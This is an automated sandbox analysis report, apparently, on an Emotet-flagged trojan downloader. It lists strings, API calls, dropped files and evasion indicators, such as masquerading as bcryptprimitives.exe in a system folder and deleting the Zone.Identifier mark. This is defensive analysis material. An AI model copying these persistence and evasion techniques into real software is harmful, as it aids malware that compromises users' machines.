          Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
          Source: svchost.exe, 00000008.00000003.303282922.000001EAE464B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000008.00000003.303312796.000001EAE4646000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000008.00000003.303312796.000001EAE4646000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000008.00000002.303856858.000001EAE4664000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
          Source: svchost.exe, 00000008.00000003.303261107.000001EAE4660000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
          Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.303656860.000001EAE463E000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
          Source: svchost.exe, 0000000F.00000003.388870530.0000015B9697C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.388898954.0000015B9695B000.00000004.00000001.sdmpString found in binary or memory: https://support.hotspotshield.com/
          Source: svchost.exe, 00000008.00000002.303656860.000001EAE463E000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
          Source: svchost.exe, 00000008.00000002.303564842.000001EAE4613000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.303656860.000001EAE463E000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000008.00000003.303331047.000001EAE4645000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000008.00000003.303331047.000001EAE4645000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
          Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
          Source: svchost.exe, 00000008.00000002.303583815.000001EAE4624000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
          Source: svchost.exe, 00000004.00000002.491328545.000002935E212000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.388392239.0000015B9693C000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: svchost.exe, 0000000F.00000003.388870530.0000015B9697C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.388898954.0000015B9695B000.00000004.00000001.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
          Source: svchost.exe, 0000000F.00000003.388870530.0000015B9697C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.388898954.0000015B9695B000.00000004.00000001.sdmpString found in binary or memory: https://www.pango.co/privacy
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_004346DE GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,0_2_004346DE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_004229A4 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_004229A4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_00431A6D ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,0_2_00431A6D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_0041FD16 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,0_2_0041FD16
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_00435F74 GetKeyState,GetKeyState,GetKeyState,0_2_00435F74
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_004346DE GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,1_2_004346DE
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_004229A4 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,1_2_004229A4
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_00431A6D ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,1_2_00431A6D
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_0041FD16 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,1_2_0041FD16
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_00435F74 GetKeyState,GetKeyState,GetKeyState,1_2_00435F74

          E-Banking Fraud:

          barindex
          Yara detected EmotetShow sources
          Source: Yara matchFile source: 00000001.00000002.488528706.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.226321958.0000000002270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.226329464.0000000002281000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.488556425.0000000000711000.00000020.00000001.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeFile created: C:\Windows\SysWOW64\TaskSchdPS\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeFile deleted: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe:Zone.IdentifierJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_00416E840_2_00416E84
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_004133EC0_2_004133EC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_00423CA40_2_00423CA4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_0040FF570_2_0040FF57
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_00416E841_2_00416E84
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_004133EC1_2_004133EC
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_00423CA41_2_00423CA4
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_0040FF571_2_0040FF57
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: String function: 00414410 appears 47 times
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: String function: 00413794 appears 200 times
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: String function: 0042534F appears 35 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: String function: 00414410 appears 47 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: String function: 00413794 appears 200 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: String function: 0042534F appears 35 times
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe, 00000000.00000000.223674726.0000000000454000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDriveBrowsingTree.EXE\ vs SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe, 00000000.00000002.227052644.0000000002E30000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe, 00000000.00000002.227052644.0000000002E30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe, 00000000.00000002.226854095.0000000002D30000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeBinary or memory string: OriginalFilenameDriveBrowsingTree.EXE\ vs SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe
          Source: classification engineClassification label: mal76.troj.evad.winEXE@15/5@0/4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_0042A5C5 __EH_prolog,GetDiskFreeSpaceA,GetFullPathNameA,GetTempFileNameA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA,0_2_0042A5C5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_00407CD0 LoadLibraryExA,LoadLibraryExA,SizeofResource,LoadLibraryExA,GetCurrentProcess,VirtualAllocExNuma,0_2_00407CD0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4876:120:WilError_01
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
          Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeProcess created: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: section name: RT_CURSOR
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: section name: RT_BITMAP
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: section name: RT_ICON
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: section name: RT_MENU
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: section name: RT_DIALOG
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: section name: RT_STRING
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: section name: RT_ACCELERATOR
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeStatic PE information: section name: RT_GROUP_ICON
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_004288FB __EH_prolog,LoadLibraryA,GetProcAddress,0_2_004288FB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_0041444B push ecx; ret 0_2_0041445B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_00413020 push eax; ret 0_2_00413034
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_00413020 push eax; ret 0_2_0041305C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_00413794 push eax; ret 0_2_004137B2
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_0041444B push ecx; ret 1_2_0041445B
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_00413020 push eax; ret 1_2_00413034
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_00413020 push eax; ret 1_2_0041305C
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_00413794 push eax; ret 1_2_004137B2

          Persistence and Installation Behavior:

          barindex
          Drops executables to the windows directory (C:\Windows) and starts themShow sources
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeExecutable created and started: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exePE file moved: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeFile opened: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe:Zone.Identifier read attributes | deleteJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_004302E7 __EH_prolog,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,0_2_004302E7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_004347C2 IsWindowVisible,IsIconic,0_2_004347C2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_00408E23 IsIconic,GetWindowPlacement,GetWindowRect,0_2_00408E23
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_0042977B GetParent,GetParent,IsIconic,GetParent,0_2_0042977B
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_004302E7 __EH_prolog,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,1_2_004302E7
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_004347C2 IsWindowVisible,IsIconic,1_2_004347C2
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_00408E23 IsIconic,GetWindowPlacement,GetWindowRect,1_2_00408E23
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_0042977B GetParent,GetParent,IsIconic,GetParent,1_2_0042977B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 2040Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 6180Thread sleep time: -90000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_0042853B __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,0_2_0042853B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_004026E0 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,0_2_004026E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_00428B68 lstrlenA,FindFirstFileA,FindClose,0_2_00428B68
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_00401640 FindFirstFileA,FindClose,0_2_00401640
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_022828B7 FindFirstFileW,FindNextFileW,FindClose,0_2_022828B7
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_0042853B __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,1_2_0042853B
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_004026E0 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,1_2_004026E0
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_00428B68 lstrlenA,FindFirstFileA,FindClose,1_2_00428B68
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_00401640 FindFirstFileA,FindClose,1_2_00401640
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_00413306 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,0_2_00413306
          Source: svchost.exe, 00000004.00000002.491577214.000002935E262000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
          Source: svchost.exe, 00000005.00000002.278763826.0000027C13D40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.365758268.00000203C40B0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.401599018.0000015B97000000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: bcryptprimitives.exe, 00000001.00000002.491630602.0000000002852000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWP
          Source: bcryptprimitives.exe, 00000001.00000002.488644506.0000000000774000.00000004.00000020.sdmp, svchost.exe, 00000004.00000002.491548254.000002935E255000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000002.400900703.0000015B960D6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: svchost.exe, 00000005.00000002.278763826.0000027C13D40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.365758268.00000203C40B0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.401599018.0000015B97000000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: svchost.exe, 00000005.00000002.278763826.0000027C13D40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.365758268.00000203C40B0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.401599018.0000015B97000000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: svchost.exe, 00000007.00000002.488446089.000001BA1B029000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: svchost.exe, 00000005.00000002.278763826.0000027C13D40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.365758268.00000203C40B0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.401599018.0000015B97000000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_004288FB __EH_prolog,LoadLibraryA,GetProcAddress,0_2_004288FB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_02272690 mov eax, dword ptr fs:[00000030h]0_2_02272690
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_02270467 mov eax, dword ptr fs:[00000030h]0_2_02270467
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_02272F70 mov eax, dword ptr fs:[00000030h]0_2_02272F70
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_02283631 mov eax, dword ptr fs:[00000030h]0_2_02283631
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_02282D51 mov eax, dword ptr fs:[00000030h]0_2_02282D51
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_004164EA SetUnhandledExceptionFilter,0_2_004164EA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_004164FE SetUnhandledExceptionFilter,0_2_004164FE
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_004164EA SetUnhandledExceptionFilter,1_2_004164EA
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_004164FE SetUnhandledExceptionFilter,1_2_004164FE
          Source: bcryptprimitives.exe, 00000001.00000002.488917746.0000000000CC0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.488428904.000002813C060000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: bcryptprimitives.exe, 00000001.00000002.488917746.0000000000CC0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.488428904.000002813C060000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: bcryptprimitives.exe, 00000001.00000002.488917746.0000000000CC0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.488428904.000002813C060000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: bcryptprimitives.exe, 00000001.00000002.488917746.0000000000CC0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.488428904.000002813C060000.00000002.00000001.sdmpBinary or memory string: Program Manager[
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: GetLocaleInfoA,0_2_0041C708
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,0_2_00401070
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,0_2_00437103
